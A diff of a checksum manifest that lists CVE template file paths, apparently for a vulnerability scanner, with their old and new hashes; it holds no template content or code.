-http/cves/2021/CVE-2021-46417.yaml:05450eaed7fad85925fbbc23c659c855a7027daa -http/cves/2021/CVE-2021-46422.yaml:294190df99da5d4b4d7f59d69d7fd2e65a245d30 -http/cves/2021/CVE-2021-46424.yaml:0279e4d60cbe5719e20c4bd6db7cb797d55a094d -http/cves/2021/CVE-2021-46704.yaml:a5747a9e3fd25d6c5af230defc50dd12d4fa4608 -http/cves/2022/CVE-2022-0140.yaml:1fb9c56cd72d0c5bdecf403ba21c1eb7d615bf00 -http/cves/2022/CVE-2022-0147.yaml:fcdd4d3d6393819be5f10c9bf432bb0c683d7003 -http/cves/2022/CVE-2022-0148.yaml:bd984cc4ca51f0f167497272d7401d242c2558c2 -http/cves/2022/CVE-2022-0149.yaml:39afc957fe16efa543178c6bd335989607ced70f -http/cves/2022/CVE-2022-0150.yaml:85000901e7efe02e160ba90de7e6791acf6bccef -http/cves/2022/CVE-2022-0165.yaml:1de532a2451b9a81a1d7ed451e2527633f9dd016 -http/cves/2022/CVE-2022-0169.yaml:66dd4a31b789b7228ff7f06de7d910c44770fff7 -http/cves/2022/CVE-2022-0189.yaml:e6700dfa6b790e306d6a9114cf2d014b79915b32 -http/cves/2022/CVE-2022-0201.yaml:87ba28df9555f17087910b76c5a7d566f5d4a79c -http/cves/2022/CVE-2022-0206.yaml:37d63c1be8e37a60456628920b7ae5e9753aadae -http/cves/2022/CVE-2022-0208.yaml:c5c7350119fa443cd660c534598dda992d89d76c -http/cves/2022/CVE-2022-0212.yaml:608533b7842dd8a015e0112055e2bd449f1312c6 -http/cves/2022/CVE-2022-0218.yaml:b1031d84cee2f2824e99c4bd6b5ffbfa3795474c -http/cves/2022/CVE-2022-0220.yaml:c8cf5eca4f53dd17e5e76ce3c4539abcc9b5d7e3 -http/cves/2022/CVE-2022-0228.yaml:433a6557d26d92f69884e375b0607483fbc9ec85 -http/cves/2022/CVE-2022-0234.yaml:06537dbc42954a7812b88272f4116c86c71e48cc -http/cves/2022/CVE-2022-0271.yaml:93818912ac7901cc9ede777039b038193f4f52aa -http/cves/2022/CVE-2022-0281.yaml:bef8db402b7f74a94fa2cdb2bb52505656e1c2ff -http/cves/2022/CVE-2022-0288.yaml:2c3cc2a4475cdcf54c4f5b1df8cc79e89ca48f44 -http/cves/2022/CVE-2022-0342.yaml:32ee718bfa372bf0b3b0aa2d19f3dc279d261008 -http/cves/2022/CVE-2022-0346.yaml:ec0f5503ecec648cf97581309acb0729adc677d6 -http/cves/2022/CVE-2022-0349.yaml:85fb067c99c6cd6b8e26b623d426823738d6f594 -http/cves/2022/CVE-2022-0378.yaml:b0383eac37b322a1b76d9280bb71b85bac8e0728 -http/cves/2022/CVE-2022-0381.yaml:c5bedd7d5e0b2af59e8899459b2b8ce1f2c1addb -http/cves/2022/CVE-2022-0412.yaml:fa7cab328929f11348316b7eb738d0b71990ca7b -http/cves/2022/CVE-2022-0415.yaml:1caa55c98c74b5957ea9c48c827919ae8747249e -http/cves/2022/CVE-2022-0422.yaml:cab7e2d9173f3057db58dea1de1da5eedbb1fd28 -http/cves/2022/CVE-2022-0432.yaml:e1582f0c7ab34150fa1a984640ceb4a92ab351ba -http/cves/2022/CVE-2022-0434.yaml:a7353e5b5c781e76dee2f52c8cf09d2599b79296 -http/cves/2022/CVE-2022-0437.yaml:c7ead8cc4801f64e63c66891e3acc435f35dd2aa -http/cves/2022/CVE-2022-0441.yaml:a9c7c5debc4094dc1f75a1f3db4ea29d7308d845 -http/cves/2022/CVE-2022-0482.yaml:37420b6a6fcf2ff3f4558e01199e4350860e48cd -http/cves/2022/CVE-2022-0533.yaml:3dadb12456360d6b5cacae60646cd9593ec019c4 -http/cves/2022/CVE-2022-0535.yaml:70555a7476ff720d4c85dbbda7903fbe279b0a44 -http/cves/2022/CVE-2022-0540.yaml:cc097acc168e135156002f0a3db887d3e30ac0cd -http/cves/2022/CVE-2022-0591.yaml:08bc6505b914a50644991de36e979873d9cb15bb -http/cves/2022/CVE-2022-0594.yaml:ecba7d10efcb95fa1743fd9711f8efb241052e08 -http/cves/2022/CVE-2022-0595.yaml:622b86034326f016b348bc5a28344378d9b5847d -http/cves/2022/CVE-2022-0597.yaml:ac6fbce1902a48e68686694e98915875a273234d -http/cves/2022/CVE-2022-0599.yaml:21721cd9683dd5d155fddbcc84b3e7c7453c31a0 -http/cves/2022/CVE-2022-0651.yaml:af450d7ff765fc106ee8ee68004769664a371ad5 -http/cves/2022/CVE-2022-0653.yaml:6f0dcc2839b13c93a0d3042d4267ba62149dc3d7 -http/cves/2022/CVE-2022-0656.yaml:fd5c38d59d3d7111e5badd88dbfc910e2413a886 -http/cves/2022/CVE-2022-0658.yaml:6c42c6cac035f98d8f5a4ada8d47f26d230eac4e -http/cves/2022/CVE-2022-0660.yaml:09aad30c6a97ed6e17b0688732fbe5d119c3d1c1 -http/cves/2022/CVE-2022-0678.yaml:029b05d274c1d7de115859ae962c4f1f39366efb -http/cves/2022/CVE-2022-0679.yaml:799a9932e8495aff0c76559c6f577038e1c8f074 -http/cves/2022/CVE-2022-0692.yaml:8c41295bbaf632b9c764ecbf1a90390f43b9a151 -http/cves/2022/CVE-2022-0693.yaml:325247278fd73f132eaadd7d852eaa5a233ac4e4 -http/cves/2022/CVE-2022-0735.yaml:f63efa6253abd64d15348c003417a48f56b05266 -http/cves/2022/CVE-2022-0747.yaml:e5af4643959d2de61dd739e2653f8538589bc0c0 -http/cves/2022/CVE-2022-0760.yaml:af4109a74a183bdf4480b3b65414131c36724384 -http/cves/2022/CVE-2022-0769.yaml:1eb9580662158ca3e342e7263e0037d3ad238b43 -http/cves/2022/CVE-2022-0773.yaml:c582b155606e6ce40d70407dbb22a15897bad486 -http/cves/2022/CVE-2022-0776.yaml:3c3abf733441ed378a9782f640a4a54fcfd06340 -http/cves/2022/CVE-2022-0781.yaml:f7bd9cbb2aff8aca956417cd77a0591d6ae935f8 -http/cves/2022/CVE-2022-0784.yaml:6249ff20e59eb83b29c4ff4b787185d61b5b23b2 -http/cves/2022/CVE-2022-0785.yaml:25b855569c59bb8e2add04996b870ea758787c70 -http/cves/2022/CVE-2022-0786.yaml:98d935eed4a856f1a4cca8cdbb5459ef0add30a6 +http/cves/2021/CVE-2021-45380.yaml:836403ac6ed5e254c920d9d95cdb2d1bd0f97af6 +http/cves/2021/CVE-2021-45422.yaml:301f72528d544db1eb5bfb6355fca5ab9a8c617e +http/cves/2021/CVE-2021-45428.yaml:0b6fd7af32806737f4e2e61a5692b88ef4fae62a +http/cves/2021/CVE-2021-45967.yaml:ba0b930528fc927070d61693c1103f26a3d7d19d +http/cves/2021/CVE-2021-45968.yaml:ac4c85361263a03ba4ddaf91f1fddfa74eed2380 +http/cves/2021/CVE-2021-46005.yaml:449083989d7ae27a1a2d06eddb5d6ecd018f1700 +http/cves/2021/CVE-2021-46068.yaml:5dbeffce44241c34e9e0a663f18f127f1ce2635a +http/cves/2021/CVE-2021-46069.yaml:2a3948ffde8c47ccffafd107d514b0581fd5859c +http/cves/2021/CVE-2021-46071.yaml:b1b00c1564a11c0d9664f34649ac376d0f3af5a4 +http/cves/2021/CVE-2021-46072.yaml:155959c6d642faa3cc2eba4c58bdb075032000f8 +http/cves/2021/CVE-2021-46073.yaml:c38e09b556deece1f4d33491357663d7bc0e106c +http/cves/2021/CVE-2021-46107.yaml:d9dc9fa78664e8b919f174dc2a9683b6d4ae9a62 +http/cves/2021/CVE-2021-46379.yaml:a6521294d5b9399bc5a741c5c8d43e0219121100 +http/cves/2021/CVE-2021-46381.yaml:8991cd413112d55657a6a0a24c0572960218aab5 +http/cves/2021/CVE-2021-46387.yaml:852d85d276aeb1aebf148c5968099ee92db76ab9 +http/cves/2021/CVE-2021-46417.yaml:7ffde534ae866d760ecc6722792d121aee5977ba +http/cves/2021/CVE-2021-46422.yaml:af3f99a6e7cbecb5969136fc31d0e69db97cdf75 +http/cves/2021/CVE-2021-46424.yaml:797b6aea4e1474723a5fc53a984521f51ac43573 +http/cves/2021/CVE-2021-46704.yaml:c47a605df439fe24a14ace4ebefb3ca78251a96b +http/cves/2022/CVE-2022-0140.yaml:d0e1e311db4e511809e49213a3f9d79a07b35b4a +http/cves/2022/CVE-2022-0147.yaml:5bd08ae25413ddd5e612ceb3a1fb792389ea4d43 +http/cves/2022/CVE-2022-0148.yaml:47b1bb988595a561999262e6407ca0329cd24151 +http/cves/2022/CVE-2022-0149.yaml:25e3ecc0b15ab351aebd64414f4c18fec564ca55 +http/cves/2022/CVE-2022-0150.yaml:c9eeaf73864148f63880f77617b2ab70b05f1e54 +http/cves/2022/CVE-2022-0165.yaml:3357ea944c67e412bc0b7f5de7caade8bda51cf2 +http/cves/2022/CVE-2022-0169.yaml:1857696bec4ec499683dbc37d10c1ecc4a2e671a +http/cves/2022/CVE-2022-0189.yaml:dd50989b3bea5e77de04d89a22b81ba023a240f6 +http/cves/2022/CVE-2022-0201.yaml:f53a7ede4b3a96fd2bf0e6baffac30d865d20855 +http/cves/2022/CVE-2022-0206.yaml:02e4ebd6beafe32b3888db1b669ec1c0af3abeae +http/cves/2022/CVE-2022-0208.yaml:4e018fac19bd0cbaf4d3348558366f3755b5d035 +http/cves/2022/CVE-2022-0212.yaml:f57983bd02c3a4b1c9db5047399bbbdb8cb6290d +http/cves/2022/CVE-2022-0218.yaml:d6545e7090f40d474ed5ba186b12889855eedb6c +http/cves/2022/CVE-2022-0220.yaml:18f8224cffb5ab9d322af0a654e80b5896038869 +http/cves/2022/CVE-2022-0228.yaml:9d41fdbac80baac248d06d5efc19c1f71d837fcb +http/cves/2022/CVE-2022-0234.yaml:a4d33fc3dadcb117b10825b3df12d7bd031050fe +http/cves/2022/CVE-2022-0271.yaml:dc35f1f98f9f57d8de78f50b0a83d576f6a7fa43 +http/cves/2022/CVE-2022-0281.yaml:719d5729f8a1a9d13e7047a6f23f31c1327fee64 +http/cves/2022/CVE-2022-0288.yaml:20ca90d84d0351614c21ecc3007d078e59cdc275 +http/cves/2022/CVE-2022-0342.yaml:d42510cf4ebaa01822a43bb5371ce6406ffceac4 +http/cves/2022/CVE-2022-0346.yaml:2874abc2cd2237f9527a30c469c18e35fed8a91f +http/cves/2022/CVE-2022-0349.yaml:ccf456c0c5d5e27428ba4a062abaa2221073c7b5 +http/cves/2022/CVE-2022-0378.yaml:d60e428f5f2e6d44433a04996c058861b5b5c86b +http/cves/2022/CVE-2022-0381.yaml:09ed0d888a0959878069bbb03136d2cc177f5be7 +http/cves/2022/CVE-2022-0412.yaml:9140ffe976e4dc0e7d15210f8b9143503c701b61 +http/cves/2022/CVE-2022-0415.yaml:71356b48f745b271ab41884607b44139134dc83b +http/cves/2022/CVE-2022-0422.yaml:5c0febb37ee2ebeba0c15125868eb63bbd89c320 +http/cves/2022/CVE-2022-0432.yaml:b903c0be9dd641f9a50bd48dddf2a1683301a4ab +http/cves/2022/CVE-2022-0434.yaml:da43b2605429bd92af5b07eea5e63aba51a1f497 +http/cves/2022/CVE-2022-0437.yaml:992196f1fd153de2b8752e8317489ecad5587187 +http/cves/2022/CVE-2022-0441.yaml:946183938be9924f80b5265ef10615e698280882 +http/cves/2022/CVE-2022-0482.yaml:df30352cab5493c168908c91c280fc0ce8207d20 +http/cves/2022/CVE-2022-0533.yaml:ef77c35ca42c39844c2baad78b21c6591c77993b +http/cves/2022/CVE-2022-0535.yaml:b60ad132b4cea5814f7b0abae7837d5d7aaf46c9 +http/cves/2022/CVE-2022-0540.yaml:0b320996689d1825f8a47c4b0afa52669d7fa4e9 +http/cves/2022/CVE-2022-0591.yaml:e52f838873ac6fe4f285ec6437f136864d9a7da6 +http/cves/2022/CVE-2022-0594.yaml:a76065d69a111962fae9334629cccf46579d7c57 +http/cves/2022/CVE-2022-0595.yaml:a9932a68e1bb8f3786d0c617fc48c369b5ef30ca +http/cves/2022/CVE-2022-0597.yaml:7f5da47b03e30d140e1c86f78ae525966d094ec8 +http/cves/2022/CVE-2022-0599.yaml:2ef670a4e05cb466bc3154dcad8c7b6f2b5487d4 +http/cves/2022/CVE-2022-0651.yaml:7bc3cc8f92eb2629fd4f8c5c34990ce7d2048c15 +http/cves/2022/CVE-2022-0653.yaml:c80743f97707c46b73dc4f2a15742fd56363df27 +http/cves/2022/CVE-2022-0656.yaml:b3c9fb02a0b749f38157aa2ce647cb3fa2ca5ffe +http/cves/2022/CVE-2022-0658.yaml:caa3aed3b5c5820dda6609760478686505f9e826 +http/cves/2022/CVE-2022-0660.yaml:684ddc66fd44b3b3bd7c7b01f28ce3f8bfbba7aa +http/cves/2022/CVE-2022-0678.yaml:bb88c4048cd4a53a2b1ea11c4bfb188883608887 +http/cves/2022/CVE-2022-0679.yaml:5dcff916e5faee304504e2340b6bd1d0e81c1454 +http/cves/2022/CVE-2022-0692.yaml:0883f77034c7c90d80b425ed0b6e8fb8fabc33e3 +http/cves/2022/CVE-2022-0693.yaml:d8933ec7cd55b47dd8769903fe2dca7581aa1ea8 +http/cves/2022/CVE-2022-0735.yaml:0c1b902582cc223e6c41b96ea2bc4f12d47759d0 +http/cves/2022/CVE-2022-0747.yaml:4135565c7548edaf162f57d6efded52b1ae36eb1 +http/cves/2022/CVE-2022-0760.yaml:7e63e720a9f6ad6e8a8562cf6a0da4f1457b717a +http/cves/2022/CVE-2022-0769.yaml:b9c57a48b05c0eeebd29cc76f38660712755b019 +http/cves/2022/CVE-2022-0773.yaml:38071bc43db8b68211e336892da221ce201883a0 +http/cves/2022/CVE-2022-0776.yaml:1b6e3a7d4c3518c9cf99cf17f220d872ee02006f +http/cves/2022/CVE-2022-0781.yaml:c37607ab83a26a8e6a17859c02910eaaf531ea45 +http/cves/2022/CVE-2022-0784.yaml:a0a38eb6dd19e3a377ed9d426b5c18c33c007c0c +http/cves/2022/CVE-2022-0785.yaml:e0c9466922136dedd19de1da050bbc9fed915e77 +http/cves/2022/CVE-2022-0786.yaml:3077319ca5d3670b337d6e4e1a1770837a7c6518 http/cves/2022/CVE-2022-0787.yaml:381b553b7e97c8dcd0b10fea1bd4f3e6325b98b0 -http/cves/2022/CVE-2022-0788.yaml:7d7aa2a57fa148fca01662039d881f61c35099f6 -http/cves/2022/CVE-2022-0814.yaml:72f066036ed6a4dec5de79e71ae6adf68744f8c7 -http/cves/2022/CVE-2022-0817.yaml:6890026f711091ecb91166f079ec3d919eae7eff -http/cves/2022/CVE-2022-0824.yaml:21d1cf352773b26406fff3833453855fdd70aceb -http/cves/2022/CVE-2022-0826.yaml:f59aeac776756dc30253f5398f9c1839d3a2169a -http/cves/2022/CVE-2022-0827.yaml:605c8f7a1e97093351443c6186f0a9bae4c8b549 -http/cves/2022/CVE-2022-0846.yaml:9d8d1329f937e175ca58855ddb806cbce335f0e1 -http/cves/2022/CVE-2022-0864.yaml:d8249ec6444874600fcfa0c89d7189aa73c515f0 -http/cves/2022/CVE-2022-0867.yaml:6f48297e8452e00a6a351e5c7c8c7158d62f2166 -http/cves/2022/CVE-2022-0869.yaml:21ad753c79e9266ac6fbca718ed8108d895796e8 -http/cves/2022/CVE-2022-0870.yaml:fa9697ced5dec973cd9d32667388e33da690e39b -http/cves/2022/CVE-2022-0885.yaml:06c279d6d3af262351473775b780e95f40406ce0 -http/cves/2022/CVE-2022-0899.yaml:ddf9b53a38b4f0003eac03a0b667031e757441dc -http/cves/2022/CVE-2022-0928.yaml:90ca15df862cdc926a0b1399d649e657aacaeb25 -http/cves/2022/CVE-2022-0948.yaml:a88b005669f3d6275f5f708cc9c601c3d07c30c1 -http/cves/2022/CVE-2022-0949.yaml:bb89f5a4be8e0327022720c50bf46dcbafac9e66 -http/cves/2022/CVE-2022-0952.yaml:a90aaa3480c7239cd8fc6098f6c31f95f46d0cc4 -http/cves/2022/CVE-2022-0954.yaml:2bce7d5ac6ef7fb4bd4f794b3d3a9fae50672d3f -http/cves/2022/CVE-2022-0963.yaml:0d7549e610fba1c0689cb438221509aa1d6fcb88 -http/cves/2022/CVE-2022-0968.yaml:cfada9c8d9d10550dfbfab57cbb948e970b78ce9 -http/cves/2022/CVE-2022-1007.yaml:695d75d99adbf58314302febf6eab9cab8d818a0 -http/cves/2022/CVE-2022-1013.yaml:86ea5cce6f46a01de6671197592320c38bf97eaa -http/cves/2022/CVE-2022-1020.yaml:158c0940d70c771a8540ca474fbcb867800bdbb0 +http/cves/2022/CVE-2022-0788.yaml:7671f420a39cb06021088cb1c485249efdae8480 +http/cves/2022/CVE-2022-0814.yaml:1a2755ccc1d2383775a133861c08a5a0f8ef1a41 +http/cves/2022/CVE-2022-0817.yaml:d51bfe6520e89c2782ff1b9d11e9ed9097e09330 +http/cves/2022/CVE-2022-0824.yaml:1a15cbedf3f423a397a27070c00db87b7251dc69 +http/cves/2022/CVE-2022-0826.yaml:e98d9007ead140477dc07788f7633b9b640b90e2 +http/cves/2022/CVE-2022-0827.yaml:485c9219dd7b2d5c48b30e66b916072128ed35a1 +http/cves/2022/CVE-2022-0846.yaml:c925df42487f6ab4f24f41153c3dc903e3e75f48 +http/cves/2022/CVE-2022-0864.yaml:31517bddb37c4c5d4b44f37aa165f9b57bfea706 +http/cves/2022/CVE-2022-0867.yaml:819cd24baf647b0aa44308e65d8eac040fc65e5f +http/cves/2022/CVE-2022-0869.yaml:f3cd9a031f4e95604a9ad42fb375898cfe91fb7b +http/cves/2022/CVE-2022-0870.yaml:dd9d530622b621fbd1872cc2ddc66b84f70e5b5a +http/cves/2022/CVE-2022-0885.yaml:8b87889914fc89e1dd4e52d09ce5bf2b813b4449 +http/cves/2022/CVE-2022-0899.yaml:f4900b1f36ba7d6ef8d59e6bfad0fb7a6a2e26a3 +http/cves/2022/CVE-2022-0928.yaml:1c4c2c9daac172ed67cb8c85c674f1880909a6de +http/cves/2022/CVE-2022-0948.yaml:5ee1655f7d2ef8d3454b3947a233c2ceca85f276 +http/cves/2022/CVE-2022-0949.yaml:5f5eeebc020dc43c75eb3406ccc220b637b4f11f +http/cves/2022/CVE-2022-0952.yaml:18b979fc7b7bc6a36e1a5887629f741c342f3faa +http/cves/2022/CVE-2022-0954.yaml:c24ca13b2d8b2575dd4139e45c104db69adbbc3c +http/cves/2022/CVE-2022-0963.yaml:2550f137cec890a2c75d407eb5d7f728afa61b30 +http/cves/2022/CVE-2022-0968.yaml:5c846d26307c5f2e4df8ec6694e83dfe909953bf +http/cves/2022/CVE-2022-1007.yaml:1bec3a9c3a39ffdfbff2fcdbe990de927be50fe9 +http/cves/2022/CVE-2022-1013.yaml:c07eff223c51d8d02db7da9e194ccc7655042c4e +http/cves/2022/CVE-2022-1020.yaml:d544b375b92f4984cf494fc55fe4293aab4c6540 http/cves/2022/CVE-2022-1040.yaml:fe6ceddfff5e82fef75719eb55f6ffdba15898db -http/cves/2022/CVE-2022-1054.yaml:d0ab653325f6c41fa73d901373081fb8b232cbce -http/cves/2022/CVE-2022-1057.yaml:00c4f170ea428f5ccb3d5b2f389f9bd306cb7992 -http/cves/2022/CVE-2022-1058.yaml:09ec5690fa632b6b2887b3283cf4f93a76ae42d3 -http/cves/2022/CVE-2022-1119.yaml:5a854314d5adb9358b347b7c3c9077b85dc8206b -http/cves/2022/CVE-2022-1162.yaml:ca55223969d584501e06328187502000887026a0 -http/cves/2022/CVE-2022-1168.yaml:9e7a85d7bcf0fcce400264727e519f81564e2b00 -http/cves/2022/CVE-2022-1221.yaml:44b6917a2d0dc6bd440fdc914607d417d254fe11 +http/cves/2022/CVE-2022-1054.yaml:33b77bed7d75fc62b0eea6004882fa532d089b45 +http/cves/2022/CVE-2022-1057.yaml:7376ffe63c810a7831e8d4193a93c0320ec64116 +http/cves/2022/CVE-2022-1058.yaml:8ff7f22a119aa76eae569fd6193c633c3c353609 +http/cves/2022/CVE-2022-1119.yaml:1532dcbf136c4811acca2556d8da3abb9db8174a +http/cves/2022/CVE-2022-1162.yaml:10309a6cb086915052dca11cd379bfc8ad34d3a8 +http/cves/2022/CVE-2022-1168.yaml:cff2ac8829133cc80964b21dfecff5ee79914890 +http/cves/2022/CVE-2022-1221.yaml:987fdd23a25725e2e757505fd60c3de221cc1c56 http/cves/2022/CVE-2022-1329.yaml:0dc413294f78de9f9e3da8be2db78551efa33b7e -http/cves/2022/CVE-2022-1386.yaml:a11c0ba42a5baf31008ee7b419da083f5b0fc123 -http/cves/2022/CVE-2022-1388.yaml:f7233e715dd6bff824bc10f8583175da00ec0677 +http/cves/2022/CVE-2022-1386.yaml:99886d83d01d14174049bb04f9f3d00197ed0910 +http/cves/2022/CVE-2022-1388.yaml:67540c2a400084bc92a5899e64af781437a9e73e http/cves/2022/CVE-2022-1390.yaml:779905536e36b2369c41a59210d18421368f1961 -http/cves/2022/CVE-2022-1391.yaml:41bebc9a3f0cc41622aadac3e969dcd71ce7adfc -http/cves/2022/CVE-2022-1392.yaml:db75791eca217e071ae4c81dc86a26b68806d560 -http/cves/2022/CVE-2022-1398.yaml:fe90d39c049cf864158faf64e93aaf1343e64de8 -http/cves/2022/CVE-2022-1439.yaml:7b43ad225fa8964b35593263cc7e6778c0a4565f -http/cves/2022/CVE-2022-1442.yaml:08714f5d6ce7487e5a14254724abe1ff0f919577 -http/cves/2022/CVE-2022-1574.yaml:6e84fde0d3d3440dd7b1310d8a414d695447d8dc -http/cves/2022/CVE-2022-1595.yaml:2243263871165c06b0cae4d9066bc64d290d058a -http/cves/2022/CVE-2022-1597.yaml:2a3ffb1ff16b49ed8afaa6b9f480e30f7f5a7661 -http/cves/2022/CVE-2022-1598.yaml:000289b6818b6e207db7ec3ec3766f3b7bd60d55 +http/cves/2022/CVE-2022-1391.yaml:fb0a449d96d58cd6b5450f79b46d264bf5fd2902 +http/cves/2022/CVE-2022-1392.yaml:53a5494ddd8c035e9c2457a949f01954d95aff7e +http/cves/2022/CVE-2022-1398.yaml:b734def8280e5167491a3cf391607997d2516aa2 +http/cves/2022/CVE-2022-1439.yaml:90ea71000ad8c6ee3f54e01883776931a1ff1da6 +http/cves/2022/CVE-2022-1442.yaml:d2bf4389fe2966951051a9a94bc9ac3f59cb7b8a +http/cves/2022/CVE-2022-1574.yaml:0e5504537fce53ae9b5dbbdacd89641191711964 +http/cves/2022/CVE-2022-1595.yaml:2007a8bfcca554700f388b716720dbc8df9a20c8 +http/cves/2022/CVE-2022-1597.yaml:f9db4c5e63ab800983cab5dceda4465e59959f3f +http/cves/2022/CVE-2022-1598.yaml:f18b8df71aab4a3bedf3998388d20b073e73bf51 http/cves/2022/CVE-2022-1609.yaml:dc87f85d148b12b7a53cce475c80a1800806c01a -http/cves/2022/CVE-2022-1713.yaml:93d2c598fe3d045089c1eb2f69c179ac6d21e722 -http/cves/2022/CVE-2022-1724.yaml:c0570a7c5839cae3d3e31f023a4b0266fe9b6aca -http/cves/2022/CVE-2022-1756.yaml:6fd57d0227c635c18d029ffa5566e00b6964be69 -http/cves/2022/CVE-2022-1768.yaml:269aa6f036b83b8ba89164f751908024bc8ab193 -http/cves/2022/CVE-2022-1815.yaml:a47966cc5df43bc0a21f3e641a95f7496f4e0fc2 -http/cves/2022/CVE-2022-1883.yaml:b68e1ea0c7e02f71790a259206c6f25f417c1c90 +http/cves/2022/CVE-2022-1713.yaml:5435cecf9483e9c85ff411d08ab035141dfacda5 +http/cves/2022/CVE-2022-1724.yaml:40ec932ecbf0c6fe70b2bf4d55d582e043467d09 +http/cves/2022/CVE-2022-1756.yaml:e2a718f4319cba444166ccab39e8b8114f7d40ea +http/cves/2022/CVE-2022-1768.yaml:78941d4e73a46c34d490bbb9b67ba0704905a03f +http/cves/2022/CVE-2022-1815.yaml:dbe71a1e1f271e5e6d88bb9d346be338ecad212a +http/cves/2022/CVE-2022-1883.yaml:3ac52af542ea6ba1f48d56019a64eaf8279fcfbc http/cves/2022/CVE-2022-1903.yaml:9877d12491b4c2d62ff3b9be79ac2502f5c45793 -http/cves/2022/CVE-2022-1904.yaml:e89ac3ddb1d85d87453203669699a4590c649a28 -http/cves/2022/CVE-2022-1906.yaml:2c299f2edc1d6372149f8e11f360adb2ea4bf946 -http/cves/2022/CVE-2022-1910.yaml:a7e379ec97221a66ce600edc9bd4828dc0d2d92a -http/cves/2022/CVE-2022-1916.yaml:a3f51c79e45ede0fb2c22fe6170f53f4a5704cf3 -http/cves/2022/CVE-2022-1933.yaml:670da7202837dc080d9337584473d28f014cf4d3 -http/cves/2022/CVE-2022-1937.yaml:cb6969aad61ece463284ed607bef62d800e3dac5 -http/cves/2022/CVE-2022-1946.yaml:80c9fbfb34c11d569a48ce4f0e913210a79b1bc6 -http/cves/2022/CVE-2022-1952.yaml:c073fac7f78ea608be321d4abd8d778e889c12dd -http/cves/2022/CVE-2022-2034.yaml:c7fe96a048d92fd28d3399241f79deeac6b0635b -http/cves/2022/CVE-2022-21371.yaml:feb2503dc90a4f120fb6bd9421e4ce36278d1830 -http/cves/2022/CVE-2022-21500.yaml:fbfd5a142f837789cabdb22731378305118be1b8 +http/cves/2022/CVE-2022-1904.yaml:e813b4ffea123df28dd0a2f8b0f0ead265fe4f39 +http/cves/2022/CVE-2022-1906.yaml:07539f20a52b4906a6df68918b3c833e7c6b47dc +http/cves/2022/CVE-2022-1910.yaml:49118c5a2c804e36352d8e825bad814b2f9cbdf7 +http/cves/2022/CVE-2022-1916.yaml:3178b08a23c952ff77927bfbe0f9d970e53fe19b +http/cves/2022/CVE-2022-1933.yaml:20d80b38a6dd94c6f9352a35bc64ae33dda1fed7 +http/cves/2022/CVE-2022-1937.yaml:65eabcd805fdf3ca6dde066e49e92f39de428669 +http/cves/2022/CVE-2022-1946.yaml:411a1e44de2355012c45098eec519a99730483b1 +http/cves/2022/CVE-2022-1952.yaml:3a1607741caefa4d364da70acce6e172777e861b +http/cves/2022/CVE-2022-2034.yaml:1635b1351c7ff7235d53599388b1b06f155d2873 +http/cves/2022/CVE-2022-21371.yaml:8278c610896724c47514d6abdfb030671f33449e +http/cves/2022/CVE-2022-21500.yaml:4a17d3e58cf733e9a7aaef7bcd6c2838c9273d53 http/cves/2022/CVE-2022-21587.yaml:f9572ad3f5e5367e293cd54d232a8a9b88f103ab http/cves/2022/CVE-2022-21661.yaml:a67e10837a42e0faa55b40dc34f8c067b106c116 -http/cves/2022/CVE-2022-21705.yaml:b1f8b81b75aa0db7107b168f71eb7b1321ce6577 -http/cves/2022/CVE-2022-2174.yaml:1ac95c7e6878581c1c84c0be160c661dda26194c -http/cves/2022/CVE-2022-2185.yaml:140b67b8c9e7256975011c5ce1310755629910f4 -http/cves/2022/CVE-2022-2187.yaml:0d24f3e4fb791c7f62b662bb8b1f3fffcc24382d -http/cves/2022/CVE-2022-2219.yaml:7ffdcdb66ece1aebbc22f033bfc8a0ce924d316e -http/cves/2022/CVE-2022-22242.yaml:99ea0fd1bba98959eb611c13f135931dfe9546de -http/cves/2022/CVE-2022-22536.yaml:85898318c4ced9a7ff21f8dc964316769334ba8a -http/cves/2022/CVE-2022-22733.yaml:03a641f8b92abac982a5a3c386c18a040052e283 -http/cves/2022/CVE-2022-22897.yaml:7caf1402d450a2084b68526337e603bf5ba859aa -http/cves/2022/CVE-2022-2290.yaml:35f27e30a61f5903dcc0f4b349ea1c4552b71ba2 -http/cves/2022/CVE-2022-22947.yaml:5f714207756d6b91f361bff0c450d4b664afa838 -http/cves/2022/CVE-2022-22954.yaml:1eb79e43cfa76b7dd4d499dbb7485f1625e3253c +http/cves/2022/CVE-2022-21705.yaml:0e69b390a9061f3917d00a8b0c4a049c8fbfdd4b +http/cves/2022/CVE-2022-2174.yaml:f89bf6da732e7ef61fbc4fd9eac8196bfdb95fb1 +http/cves/2022/CVE-2022-2185.yaml:8ab4964881c5fb79d398909adfa8c174a6fce538 +http/cves/2022/CVE-2022-2187.yaml:c0e1d276cc93b705445867d345a423b4c435a8e0 +http/cves/2022/CVE-2022-2219.yaml:87737c8e3f7aaf4b1f6d6f63aba801751e528da8 +http/cves/2022/CVE-2022-22242.yaml:f41c850a3943253bab1d7d3a9752d1c0a5251ed7 +http/cves/2022/CVE-2022-22536.yaml:3b5dd3a759c547567949468a95d0ef4e09ad06e6 +http/cves/2022/CVE-2022-22733.yaml:80d3b981827652e4781ae3f3fb1fec43c205eacf +http/cves/2022/CVE-2022-22897.yaml:54dd4290ba7145ea64fd0d6fbea1a58a5972da0f +http/cves/2022/CVE-2022-2290.yaml:df38961ca9f1f0737bd20336ccc6e75ff6d275cf +http/cves/2022/CVE-2022-22947.yaml:ccc08717aca78332c9cefc22147c57eac36bd991 +http/cves/2022/CVE-2022-22954.yaml:4c2f95cb843f61169da1f30ae7aad3295785c177 http/cves/2022/CVE-2022-22963.yaml:50839238d649161c3c94d2e168d6f1c0aa698808 -http/cves/2022/CVE-2022-22965.yaml:f59583a82f46c6a8918a7bb28a94d69dd8cb556b -http/cves/2022/CVE-2022-22972.yaml:42ee5c9bf6f1236d77dbd06186c342746e508ebc -http/cves/2022/CVE-2022-23102.yaml:63bc489b290efca577fa3c152290d65e2f661ec5 -http/cves/2022/CVE-2022-23131.yaml:2ae5bcfda58d3ede63465ca163c4bf1e218e03fd -http/cves/2022/CVE-2022-23134.yaml:84070b2c5478ca49adab26bb53f6c64eb96895a6 -http/cves/2022/CVE-2022-2314.yaml:df8d0e4aa31e80a3638e3f2238478d2d6822c0f8 -http/cves/2022/CVE-2022-23178.yaml:ace08dcb4d1ebb758dcfa7d256970bdf894f2d6d -http/cves/2022/CVE-2022-23347.yaml:98cc101069ebd85b3a1b7dfa76cec62bc4ed2b04 -http/cves/2022/CVE-2022-23348.yaml:bc00f8e974fed2ae62e73b5aa465183dbb4569da -http/cves/2022/CVE-2022-23544.yaml:4687c8dbd80ae36addcdb433c40c420a7d442849 